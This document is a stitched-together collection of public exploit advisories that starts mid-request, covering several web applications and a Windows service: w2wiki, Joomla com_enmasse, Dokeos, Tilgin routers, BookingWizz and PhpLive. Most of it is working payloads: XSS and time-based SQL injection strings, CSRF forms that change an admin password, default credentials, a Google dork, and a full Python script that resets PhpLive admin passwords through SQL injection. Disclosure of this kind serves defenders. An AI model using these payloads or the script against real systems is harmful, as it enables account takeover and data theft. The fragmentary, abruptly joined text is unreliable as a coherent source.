Cookie: PHPSESSID=3oecem8o5c8975dcufbb0moqn5; W2=dgf6v5tn2ea8uitvk98m2tfjl7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
page=xss&newText=afsd%3Cimg+src%3D%22h%22+onerror%3Dalert%2845%29%3Eaa&action=save
# Vulnerability influence can be found in the wiki. -> script in created page
================================================================================================
### Vulnerability 2 : Reflected XSS
edit page
http://127.0.0.1/vul_test/w2wiki/index.php?action=edit&page="><img src="z" onerror=alert(45)>
search page
http://127.0.0.1/vul_test/w2wiki/index.php?action=search&q="><img src="z" onerror=alert(45)>
# Exploit Title: Joomla com_enmasse - SQL Injection
# Author: [ Hamed Izadi ]
#IRAN
# Vendor Homepage : http://extensions.joomla.org/extensions/extension/social-web/social-buy/en-masse
# Category: [ Webapps ]
# Tested on: [ Win ]
# Versions: 5.1-6.4
# Date: 2016/06/15
# Google Dork: inurl:component/enmasse/
# PoC:
# id Parameter Vulnerable To SQL
# Demo:
# http://server/component/enmasse/term?tmpl=component&id=2%27
# Youtube: https://youtu.be/LB5qVnXhzXE
# L u Arg
----------------------------------------------------------------------------------------------------------
# Exploit Title: AdobeUpdateService - Privilege Escalation Unquoted Service Path vulnerability
# Date: 18/05/2016
# Exploit Author : Cyril Vallicari
# Vendor Homepage: http://www.adobe.com/fr/
# Software Link: http://www.adobe.com/downloads.html
# Version: 3.6.0.248
# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
The application suffers from an unquoted search path issue impacting the service 'AdobeUpdateService' for Windows deployed as part of Adobe Creative Cloud
This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges on the system.
POC :
C:\Users\Utilisateur>sc qc AdobeUpdateService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: AdobeUpdateService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : AdobeUpdateService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Video POC : https://www.youtube.com/watch?v=RyzYkd05xM4
Patch :
Fixed in version 3.7.0.271
Additional notes :
https://helpx.adobe.com/security/products/creative-cloud/apsb16-21.html
# Exploit Title: Dokeos Blind SQL Injection
# Date: 2016-06-14
# Exploit Author: Mormoroth
# Exploit Author Blog: http://ha.cker.ir
# Vendor Homepage: http://www.dokeos.com/
# Software Link: http://jaist.dl.sourceforge.net/project/dokeos/dokeos-2.1.1.zip
# Version: 2.2.1
# Tested on: Ubuntu
# Twitter : https://twitter.com/Mormoroth
------
Note : hackme.com is localdomain on lab , not a live website
------
VULNERABILITY
curdirpath in slidshow.php is vulnerable to time-based blind sqlinjection
------
POC :
Payload: http://hackme.com:80/dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=' AND (SELECT * FROM (SELECT(SLEEP(5)))Pfag) AND 'NFwV'='NFwV&slide_id=all
------
Exploiting vulnerability with Sqlmap
Note : to exploit with sqlmap you should use --tamper=between option to retrieve data
------
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://hackme.com:80/dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=' AND (SELECT * FROM (SELECT(SLEEP(5)))Pfag) AND 'NFwV'='NFwV&slide_id=all
------
[22:25:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS: MySQL 5.0.12
[22:25:09] [INFO] fetching current database
[22:25:09] [INFO] resumed: dokeos_main
current database: 'dokeos_main'
[22:25:09] [INFO] fetched data logged to text files under 'C:\Users\Mort\.sqlmap\output\hackme.com'
C:\Users\Mort\Desktop\Apps\sqlmap>
------
Hyperoptic (Tilgin) Router HG23xx Multiple XSS And CSRF Vulnerabilities
Vendor: Hyperoptic Ltd. | Tilgin AB
Product web page: http://www.hyperoptic.com
http://www.tilgin.com
Affected version: HG2330, HG2302 and HG2301
Summary: Tilgin's HG23xx family of products offers a flexible and
high capacity product in a tiny form factor. When having the product
in your hands, do not get fooled by its mere size. The product offers
full gigabit routing and a state of the art superior WLAN solution.
It runs all services offered with Tilgin HGA and is prepared for all
foreseeable future services. The product is also offered in an entry
level version with fast Ethernet LAN ports, still with gigabit Ethernet
WAN. The routing capacity and excellent WLAN remains the same also on
this model, the only limit being the fast Ethernet LAN ports.
Desc: The application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site. XSS issues
were also discovered. The issue is triggered when input passed via multiple
POST and GET parameters are not properly sanitized before being returned
to the user. This can be exploited to execute arbitrary HTML and script
code in a user's browser session in context of an affected site.
Tested on: lighttpd/1.4.26-devel-166445
lighttpd/1.4.26-devel-163573
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5329
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5329.php
11.05.2016
--
Default credentials:
--------------------
user/user
admin/admin
admin/abcd2301
XSS PoC:
--------
POST /advanced/firewall_templates/ HTTP/1.1
Host: 192.168.1.1
__form=new&name=test"><script>prompt(1)</script>
Response:
[..snip..]
<INPUT type="hidden" name="name" value="test"><script>prompt(1)</script>">
[..snip..]
CSRF Add Storage (HTTP/SMB) User:
---------------------------------
<html>
<body>
<form action="http://192.168.1.1/storage/users/" method="POST">
<input type="hidden" name="__form" value="new" />
<input type="hidden" name="name" value="testuser" />
<input type="hidden" name="password" value="testpass" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
CSRF Change Admin Password:
---------------------------
<html>
<body>
<form action="http://192.168.1.1/tools/admin_account/" method="POST">
<input type="hidden" name="__form" value="user" />
<input type="hidden" name="name" value="admin" />
<input type="hidden" name="password" value="NEWPASS" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
1. ADVISORY INFORMATION
========================================
Title: BookingWizz < 5.5 Multiple Vulnerability
Application: BookingWizz
Class: Sensitive Information disclosure
Remotely Exploitable: Yes
Versions Affected: < 5.5
Vendor URL: http://codecanyon.net/item/booking-system/87919
Bugs: Default credentials, CSRF, XXS, SQLi Injection, LFI
Date of Public Advisory: 15 Jun 2016
Author: Mehmet Ince
2. CREDIT
========================================
Those vulnerabilities was identified during external penetration test
by Mehmet INCE from PRODAFT / INVICTUS
Original Advisory:
https://www.mehmetince.net/exploit/bookingwizz-55-multiple-vulnerability
PR1 - Default Administrator Credentials
========================================
File: install.php
People are to lazy to change default credential unless application force
them to do that.
Line 128: <br />Default username/password: <b>admin/pass</b></div>";
PR2 - Cross Site Scripting
========================================
File : eventList.php
// Improper user input validation on
Line 24: $serviceID =
(!empty($_REQUEST["serviceID"]))?strip_tags(str_replace("'","`",$_REQUEST["serviceID"])):getDefaultService();
Line 60: <?php echo SAMPLE_TEXT?> <strong><?php echo VIEW?> <a
href="index.php?serviceID=<?php echo $serviceID?>"><?php echo
CALENDAR?></a></strong>
Payload = 1337" onmouseover="alert(1)
PoC =
http://www.convergine.com/scripts/booking/eventList.php?serviceID=1337%22%20onmouseover=%22alert(1)
PR3 - Local File Inclusion
========================================
File:config.php
Lang variable is under the user control.
Line 31: $lang = (!empty($_REQUEST["lang"])) ? strip_tags(str_replace("'",
"`", $_REQUEST["lang"])) : 'english';
Storing user controlled variable within session variable.
Line 36 - 38 :
if (!empty($_REQUEST["action"]) && $_REQUEST["action"] == "changelang") {
$_SESSION['curr_lang'] = $lang;
}
And using it with include function which cause straightforward file
inclusion.
Line 60 - 68:
$languagePath = MAIN_PATH."/languages/".$_SESSION['curr_lang'].".lang.php";
if(is_file($languagePath)) {
include MAIN_PATH."/languages/".$_SESSION['curr_lang'].".lang.php";
}else{
print "ERROR !!! Language file ".$_SESSION['curr_lang'].".lang.php not
found";
exit();
}
PR4 - SQL Injection
========================================
We've seen a lot of potentially SQL Injection vulnerability during code
review.
2 example can be given for this potential points.
File : ajax/checkDeletedServices.php
line 19 - 20:
$bsid = (!empty($_REQUEST["bsid"])) ? $_REQUEST["bsid"] : array();
$type = (!empty($_REQUEST["type"])) ? $_REQUEST["type"] : 'service';
Line 26:
if($type=='service'){
$service = getService($id);
$name = $service['name'];
}
This function executes query with $id parameter which is user input through
checkDeletedServices.php file.
function getService($id, $field=null) {
$sql = "SELECT * FROM bs_services WHERE id='{$id}'";
$res = mysql_query($sql);
if ($field == null) {
return mysql_fetch_assoc($res);
} else {
$row = mysql_fetch_assoc($res);
return $row[$field];
}
}
File : ajax/checkChangeAvailability.php
Line 19 -21
$id = (!empty($_REQUEST["id"])) ? $_REQUEST["id"] : '';
$interval = getServiceSettings($id,'interval');
getServiceSettings function calls another function named as getService
which is also vulnerable against SQL Injection.
function getServiceSettings($id, $field=null) {
$serviceType = getService($id,'type');
if($serviceType=='t'){
$sql = "SELECT * FROM bs_service_settings bss
INNER JOIN bs_services bs ON bss.serviceId = bs.id
WHERE bss.serviceID='{$id}'";
}else{
$sql = "SELECT * FROM bs_service_days_settings bsds
INNER JOIN bs_services bs ON bsds.idService = bs.id
WHERE bsds.idService='{$id}'";
}
$res = mysql_query($sql);
$row = mysql_fetch_assoc($res);
$row['type'] = $serviceType;
if ($field == null) {
return $row;
} else {
return $row[$field];
}
}
In order to exploit this flaws, Time Based SQLi techniques was used.
Payload: id=1' AND SLEEP(5) AND 'WAlE'='WAlE
PR5 - CSRF
========================================
File: bs-settings.php
This file is reponsible for administrator account settings. Here is the
HTTP POST request.
POST /booking/bs-settings.php HTTP/1.1
Host: www.test.dev
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101
Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.test.dev/scripts/booking/bs-settings.php
Cookie: PHPSESSID=1511036c75229f53ae475a0615661394;
__utma=256227097.1395600583.1465982938.1465982938.1465982938.1;
__utmc=256227097;
__utmz=256227097.1465982938.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
wordfence_verifiedHuman=498f28acf0e6151e19053a23c0fbc76b
Connection: close
Content-Type: multipart/form-data;
boundary=---------------------------305761854111129072091034307
Content-Length: 2678
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="new_pass"
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="new_pass2"
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="email"
test@yopmail.com
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="pemail"
test@yopmail.com
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="pcurrency"
CAD
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="tax"
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="time_mode"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="date_mode"
Y-m-d
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="use_popup"
1
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="currency"
$
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="currencyPos"
b
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="lang"
english
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="language_switch"
1
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="timezone"
America/Toronto
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="multi_day_notification"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="multi_day_notification_on"
n
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="single_day_notification"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="single_day_notification_on"
n
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="event_notification"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="event_notification_on"
n
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="cron_type"
cron
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="edit_settings"
yes
-----------------------------305761854111129072091034307--
There is NOT csrf token at all. Furthermore, application does not validated
current password.
--
Sr. Information Security Engineer
https://www.mehmetince.net
#!/bin/env python
################################################################################################
# Exploit title: Password Recovery Sql Injection
# Exploit Author: Tiago Carvalho
# Vendor Homepage: http://www.phplivesupport.com/?plk=osicodes-5-ykq-m
# Version : 4.4.8 - 4.5.4
# Product Name: Phplive
# Tested on: Debian \ Kali linux 2016-1
################################################################################################
"""
Their are multiple sql injection vunlerabilities in this product.
The exploit uses the sql injection vulnerability on the last step of the password recovery process
and force the application to rest the password and show the username, without requiring authentication
or to ever execute the first step, the vulnerability allows the recovery of both admin and operator.
Vulnerable code location: API/Setup/get.php
The filtering in place allows alphanumeric and restricts the use of serveral special chars,
its use of mysql escape functions and stripslashes are bypassed by since theirs no need to inject
special char to create a valid statement.
FUNCTION Setup_get_InfoByID( &$dbh,
$adminid )
{
if ( $adminid == "" )
return false ;
LIST( $adminid ) = database_mysql_quote( $dbh, $adminid ) ;
$query = "SELECT * FROM p_admins WHERE adminID = $adminid LIMIT 1" ;
database_mysql_query( $dbh, $query ) ;
if ( $dbh[ 'ok' ] )
{
$data = database_mysql_fetchrow( $dbh ) ;
return $data ;
}
return false ;
}
Vulnerable code location: /API/Ops/get.php
FUNCTION Ops_get_OpInfoByID( &$dbh,
$opid )
{
if ( $opid == "" )
return false ;
LIST( $opid ) = database_mysql_quote( $dbh, $opid ) ;
$query = "SELECT * FROM p_operators WHERE opID = $opid LIMIT 1" ;
database_mysql_query( $dbh, $query ) ;
if ( $dbh[ 'ok' ] )
{
$data = database_mysql_fetchrow( $dbh ) ;
return $data ;
}
return false ;
}
"""
import re
import urllib2
import md5
import string
import argparse
match = re.compile(r"<div\sclass=\"edit_title\".*?>(.*)</div>", re.MULTILINE)
server_url = "localhost/phplive"
def build_payload(host, sql, search_exp, target, last_active, passwd):
req_url = "http://%s/index.php%s"
url_params = "?v=%s&%s=0+%s"
str = sql % (last_active, passwd, search_exp)
pwd_verify = md5.new("%d%d" % (last_active,passwd)).hexdigest()
url_params = url_params % (pwd_verify,target,str)
return req_url % (host, url_params)
def exploit(host, admin, last_active, passwd):
if admin:
target="adminid"
sql = "union+all+select+adminid,created,%d,status,ses,login,%d,email+from+p_admins+where+login+like+%s25"
else:
target="opid"
sql = "union+all+select+opid,%d,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,login,%d,0,0,0,0,0,0+from+p_operators+where+login+like+%s25"
char_list = list(string.ascii_letters)
for char in char_list:
payload = build_payload(host, sql, hex(ord(char)), target=target, last_active=last_active, passwd=passwd)
request = urllib2.urlopen(payload)
if request.code == 200:
html = request.read()
result = match.findall(html)
if len(result) == 2 and result[1]:
print "[*]\tSUCCESS!!!!!"
print "[*]\t%s %s" % (re.sub("<span.*?>|</span>","",result[0]), result[1])
break
# exploit(server_url, admin=False, last_active=1, passwd=1)
if __name__ == '__main__':
admin = True
parser = argparse.ArgumentParser(description='PhpLive 4.4.8 Password Recovery Sql injection Exploit')
parser.add_argument("-u", "--url", help="url host|ipaddress/path eg: localhost/phplive")
parser.add_argument("-o", "--operator", help="Execute operators password reset", action="store_true")
parser.add_argument("-l", "--lastactive", help="Last active date (int)", type=int, default=0)
parser.add_argument("-p", "--passwd", help="Password (int)", type=int, default=0)
args = parser.parse_args()
if args.operator:
print "[*]\toperator password reset"
admin = False
exploit(args.url, admin, args.lastactive, args.passwd)